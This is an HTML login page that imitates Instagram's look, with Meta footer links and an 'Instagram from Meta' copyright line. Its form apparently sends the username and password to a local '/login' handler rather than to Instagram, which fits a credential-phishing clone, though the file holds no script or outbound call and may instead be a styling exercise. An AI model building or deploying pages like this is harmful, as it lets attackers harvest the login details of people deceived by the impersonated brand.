<!DOCTYPE html>
<html lang="eng">
<head>
    <link rel="stylesheet" href="../static/style.css">
    <link href="https://fonts.googleapis.com/css?family=Indie+Flower|Overpass+Mono" rel="stylesheet">
    <title>title</title>
</head>

<body>
    <div id="wrapper">
    
        <div class="main-content">
            <div class="header">
            <img src="../static/zqpwkLQ.png" />
            </div>
            <div class="l-part">
            <form action="/login" method="post">
            <!-- <label for="username">Username:</label> -->
            <input type="text" name="username" id="username" placeholder="Phone number, username, or email" class="input-1" />
            <!-- <div class="overlap-text"> -->
            <input type="password" name="password" id="password" placeholder="Password" class="input-2" />
            <!-- </div> -->
            <input type="submit" value="Log in" class="btn" />
            </form>
            </div>
        </div>
        <div class="sub-content">
            <div class="s-part">
            Don't have an account? <a href="#">Sign up</a>
            </div>
        </div>
    </div>

    <footer class="footer">
        <div class="list">
        <ul class="footerbarList">
            <li class="footerbarListItem ">Meta</li>
            <li class="footerbarListItem ">About</li>
            <li class="footerbarListItem ">Blog</li>
            <li class="footerbarListItem ">Jobs</li>
            <li class="footerbarListItem ">Help</li>
            <li class="footerbarListItem ">API</li>
            <li class="footerbarListItem ">Privacy</li>
            <li class="footerbarListItem ">Cookie Setting</li>
            <li class="footerbarListItem ">Terms</li>
            <li class="footerbarListItem ">Location</li>
            <li class="footerbarListItem ">Instagram hite</li>
            <li class="footerbarListItem ">Contact Upload & Non-User</li>
            <li class="footerbarListItem ">Meta Verified</li>

        </ul>
    </div>
    <div class="info">
        <br><br>
        <span class="info">© 2024 Instagram from Meta</span>
    </div>
    </footer>
</body>

</html>



